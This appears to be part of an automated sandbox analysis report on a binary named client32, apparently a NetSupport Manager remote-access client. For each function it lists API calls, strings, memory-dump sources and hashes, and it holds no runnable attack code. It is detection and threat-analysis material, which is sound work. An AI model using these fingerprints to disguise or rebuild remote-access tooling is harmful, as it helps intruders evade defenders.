                                                                              Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                              • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                              • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                              • String ID: 8
                                                                              • API String ID: 762489935-4194326291
                                                                              • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                              • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                              Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                              • _memset.LIBCMT ref: 11005240
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                              • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2755257978-4108050209
                                                                              • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                              • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                              Function 11131730 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102registrystringmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,75920BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                              • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
                                                                              • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                              • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                              • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                              • API String ID: 2999768849-588814233
                                                                              • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                              • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                              • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                              • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                              Function 1101D720 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101D750
                                                                              • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                              • _memset.LIBCMT ref: 1101D77A
                                                                              • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                              • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                              • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                              • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                              • String ID: NSMChatSizeWnd
                                                                              • API String ID: 2883038198-4119039562
                                                                              • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                              • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                              • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                              • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                              Function 11033470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 110334CA
                                                                              • _memset.LIBCMT ref: 11033501
                                                                              • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                              • GetLastError.KERNEL32 ref: 11033534
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • _memmove.LIBCMT ref: 1103357E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                              • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                              • API String ID: 2414640225-228067302
                                                                              • Opcode ID: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                              • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                              • Opcode Fuzzy Hash: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                              • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                              Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                              • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                              • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                              • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                              • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Sleep
                                                                              • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                              • API String ID: 4250438611-314227603
                                                                              • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                              • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                              Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strncmp.LIBCMT ref: 1100953A
                                                                              • _strncmp.LIBCMT ref: 1100954A
                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,EE49F673), ref: 110095EB
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                              • IsA(), xrefs: 110095A5, 110095CD
                                                                              • http://, xrefs: 11009535, 11009548
                                                                              • https://, xrefs: 1100952F
                                                                              • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncmp$FileWrite
                                                                              • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                              • API String ID: 1635020204-3154135529
                                                                              • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                              • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                              Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                              • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                              • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                              • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                              • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$ClassMessageNamePostTextWindow
                                                                              • String ID: #32770$Tapiexe
                                                                              • API String ID: 3170390011-3313516769
                                                                              • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                              • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                              • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                              • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                              Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                              • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                              • GetDlgItem.USER32(?,?), ref: 11023414
                                                                              • SetFocus.USER32(00000000), ref: 11023417
                                                                              • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1605826578-1986719024
                                                                              • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                              • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                              Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
